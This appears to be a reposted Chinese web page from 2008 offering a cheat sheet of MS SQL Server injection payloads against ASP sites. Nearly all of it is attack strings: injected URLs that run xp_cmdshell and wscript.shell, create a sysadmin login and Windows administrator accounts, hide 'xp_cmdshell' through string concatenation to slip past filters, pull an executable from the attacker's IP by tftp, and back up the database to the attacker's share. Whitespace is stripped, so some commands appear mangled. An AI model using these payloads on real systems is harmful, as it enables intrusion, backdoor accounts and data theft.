非常经典的Ms Sql注射资料
2008-10-04 11:10:32 来源:WEB开发网得到了web路径d:xxxx,接下来:
http://xx.xx.xx.xx/111.asp?id=3400;useku1;--
http://xx.xx.xx.xx/111.asp?id=3400;createtablecmd(strimage);--
传统的存在xp_cmdshell的测试过程:
;execmaster..xp_cmdshell'dir'
如果被限制则可以。
;execmaster.dbo.sp_addloginhax;--
;execmaster.dbo.sp_passwordnull,hax,hax;--
;execmaster.dbo.sp_addsrvrolememberhaxsysadmin;--
;execmaster.dbo.xp_cmdshell'netuserhax5258/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorshax/add';--
execmaster..xp_servicecontrol'start','schedule'
execmaster..xp_servicecontrol'start','server'
http://www.xxx.com/list.asp?classid=1;DECLARE@shellINTEXECSP_OAcreate'wscript.shell',@shellOUTPUTEXECSP_OAMETHOD@shell,'run',null,'C:WINNTsystem32cmd.exe/cnetuserswap5258/add'
;DECLARE@shellINTEXECSP_OAcreate'wscript.shell',@shellOUTPUTEXECSP_OAMETHOD@shell,'run',null,'C:WINNTsystem32cmd.exe/cnetlocalgroupadministratorsswap/add'
http://localhost/show.asp?id=1';execmaster..xp_cmdshell'tftp-iyouipgetfile.exe'-
declare@asysnameset@a='xp_'+'cmdshell'exec@a'dirc:'
declare@asysnameset@a='xp'+'_cm'+'dshell'exec@a'dirc:'
;declare@a;set@a=db_name();backupdatabase@atodisk='你的IP你的共享目录bak.dat'
更多精彩
赞助商链接